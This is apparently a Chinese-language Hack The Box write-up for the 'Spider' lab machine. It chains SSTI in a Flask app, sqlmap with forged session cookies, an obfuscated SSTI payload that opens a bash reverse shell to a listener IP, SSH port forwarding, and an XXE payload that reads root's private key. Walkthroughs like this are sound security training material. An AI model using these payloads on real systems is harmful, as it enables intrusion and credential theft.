Hackthebox - Spider

靶场信息

靶场类型

信息搜集

使用nmap进行端口扫描

nmap -A -sS -sV -sC 10.10.10.243

我们可以看到，存在22和80端口，咱们访问一下80端口

会被重定向到spider.htb，咱们先把它加入hosts文件吧

echo 10.10.10.243 spider.htb > /etc/hosts

再访问可以发现是一个家具页面，咱们做一下信息搜集

gobuster dir -u http://spider.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -t 50

/cart (Status: 500) \[Size: 290\]
/checkout (Status: 500) \[Size: 290\]
/index (Status: 200) \[Size: 11273\]
/login (Status: 200) \[Size: 1832\]
/logout (Status: 302) \[Size: 209\] \[--> http://spider.htb/\]
/main (Status: 302) \[Size: 219\] \[--> http://spider.htb/login\]
/register (Status: 200) \[Size: 2130\]
/user (Status: 302) \[Size: 219\] \[--> http://spider.htb/login\]
/view (Status: 302) \[Size: 219\] \[--> [http://spider.htb/login](http://spider.htb/login)\]

我们可以看到，能访问的只有注册页面和登录页面，咱们先去看看注册页面

咱们注册一个用户

7443d68c-02b2-428c-b622-af15604cd905

咱们得到了一段UUID，使用密码登录试试

登录后似乎也只有这个页面可以点击，咱们再多看看

在做信息搜集的时候，突然醒悟过来，这会不会是个SSTI？咱们测试一下

咱们测试一下

登陆后查看一下我们的账户信息

好家伙，确实是

这里可以进行SSTI攻击，那么意味着服务器正在运行Jinja2或者Flask，这里是Flask

漏洞利用

这里我们查看一下config信息，注册一个用户

<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE\_EXCEPTIONS': None, 'PRESERVE\_CONTEXT\_ON\_EXCEPTION': None, 'SECRET\_KEY': 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942', 'PERMANENT\_SESSION\_LIFETIME': datetime.timedelta(31), 'USE\_X\_SENDFILE': False, 'SERVER\_NAME': None, 'APPLICATION\_ROOT': '/', 'SESSION\_COOKIE\_NAME': 'session', 'SESSION\_COOKIE\_DOMAIN': False, 'SESSION\_COOKIE\_PATH': None, 'SESSION\_COOKIE\_HTTPONLY': True, 'SESSION\_COOKIE\_SECURE': False, 'SESSION\_COOKIE\_SAMESITE': None, 'SESSION\_REFRESH\_EACH\_REQUEST': True, 'MAX\_CONTENT\_LENGTH': None, 'SEND\_FILE\_MAX\_AGE\_DEFAULT': datetime.timedelta(0, 43200), 'TRAP\_BAD\_REQUEST\_ERRORS': None, 'TRAP\_HTTP\_EXCEPTIONS': False, 'EXPLAIN\_TEMPLATE\_LOADING': False, 'PREFERRED\_URL\_SCHEME': 'http', 'JSON\_AS\_ASCII': True, 'JSON\_SORT\_KEYS': True, 'JSONIFY\_PRETTYPRINT\_REGULAR': False, 'JSONIFY\_MIMETYPE': 'application/json', 'TEMPLATES\_AUTO\_RELOAD': None, 'MAX\_COOKIE\_SIZE': 4093, 'RATELIMIT\_ENABLED': True, 'RATELIMIT\_DEFAULTS\_PER\_METHOD': False, 'RATELIMIT\_SWALLOW\_ERRORS': False, 'RATELIMIT\_HEADERS\_ENABLED': False, 'RATELIMIT\_STORAGE\_URL': 'memory://', 'RATELIMIT\_STRATEGY': 'fixed-window', 'RATELIMIT\_HEADER\_RESET': 'X-RateLimit-Reset', 'RATELIMIT\_HEADER\_REMAINING': 'X-RateLimit-Remaining', 'RATELIMIT\_HEADER\_LIMIT': 'X-RateLimit-Limit', 'RATELIMIT\_HEADER\_RETRY\_AFTER': 'Retry-After', 'UPLOAD\_FOLDER': 'static/uploads'}>

我们得到了相关的配置信息

我们筛选一下其中的关键信息

secret\_key = Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942

首先安装一下咱们需要的模块

pip3 install flask_unsign

然后咱们使用sqlmap的eval处理session参数

sqlmap http://spider.htb/ --eval "from flask\_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=\*" --delay 1 --dump

第一个选项输入Y，后面的都输入N

成功得到uuid和password

uuid = 129f60ea-30cf-4065-afb9-6be45ad38b73
password = ch1VW4sHERE7331

咱们去登录

啊哈，这次出现不一样的界面了

让我们去检查一下messages

/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal

咱们得到了一个链接，去访问一下

http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal

首先让我们构造payload

bash -c 'exec bash -i &>/dev/tcp/10.10.14.54/4444 <&1'

然后转化为base64格式

YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMTAuMTQuNTQvNDQ0NCA8JjEn

然后构造poc

{% with a = request\["application"\]\["\\x5f\\x5fglobals\\x5f\\x5f"\]\["\\x5f\\x5fbuiltins\\x5f\\x5f"\]["\\x5f\\x5fimport\\x5f\\x5f"]("os")["popen"]("echo -n YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMTAuMTQuNTQvNDQ0NCA8JjEn | base64 -d | bash")\["read"\]() %} a {% endwith %}

然后本地监听一个端口

nc -nvlp 4444

成功getshell

成功拿到user权限的flag

权限提升

我们可以看到/home/chiv目录下存在.ssh目录，那应该是存在密钥的，咱们进去看看

成功拿到私钥

保存到本地

使用ssh进行登录

登录成功

查看一下正在运行的端口

ss -tupln

咱们发现本地运行着8080端口

咱们需要把端口转发出来

ssh -i id\_chiv -L 8080:localhost:8080 chiv@spider.htb

然后咱们打开firefox进行访问http://127.0.0.1:8080/

端口转发成功

这边随便一个账户都可以登录

咱们查看一下cookie，这里cookie需要解密

.eJw1jE1PwyAAhv-K4eyB1u3SZJcKtHZChfLRcbNhCa3Q1clhbtl\_d9N4fPM8z3sB4RQDKC7gYQAFUJgRh0-SfzRamDTrmJm9od9Dbcd3RVayWkqnMsR7QTUSrwr7rYsvZ9UldONzp1jZkqUWU2nv\_L4tDIgb13CIV5b4dqhYYsaPOlNHqUWzDyVqJZlosOtdzCpHFsVwuvl\_f7-99N7gdTTada4iPXtOTNQu32nf2hB6NQuvz\_zI8\_DvUxqag8WObCH7dE92GmTILebwjW824PoIlsM4py9QwOsPiZ9VQg.YMsGpQ.L71-NNdbcE09uMjZzZWHHG-Zytw

使用flask-unsign进行解码

flask-unsign --decode --cookie .eJw1jE1PwyAAhv-K4eyB1u3SZJcKtHZChfLRcbNhCa3Q1clhbtl\_d9N4fPM8z3sB4RQDKC7gYQAFUJgRh0-SfzRamDTrmJm9od9Dbcd3RVayWkqnMsR7QTUSrwr7rYsvZ9UldONzp1jZkqUWU2nv\_L4tDIgb13CIV5b4dqhYYsaPOlNHqUWzDyVqJZlosOtdzCpHFsVwuvl\_f7-99N7gdTTada4iPXtOTNQu32nf2hB6NQuvz\_zI8\_DvUxqag8WObCH7dE92GmTILebwjW824PoIlsM4py9QwOsPiZ9VQg.YMsGpQ.L71-NNdbcE09uMjZzZWHHG-Zytw

返回了一段base64码

{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+MTIzPC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4=', 'points': 0}

咱们解密一下

咱们查看源代码

我们在登录页面的源代码中可以看到有一个hidden值，所以咱们可以利用XXE攻击

参考链接

https://github.com/LucifielHack/PayloadsAllTheThings/tree/master/XXE%20Injection

咱们构造一个poc

username=%26username%3b&version=1.0.0--><!DOCTYPE+foo+\[<!ENTITY+username+SYSTEM+"/root/.ssh/id\_rsa">+\]><!--

然后使用burp抓个包

然后咱们加入构造的poc

成功获得root用户的密钥

咱们保存到本地使用密钥进行登录

成功登录root权限

成功拿到root权限的flag

Spider - Hackthebox

2021-06-17

Spider - Hackthebox

Hackthebox - Spider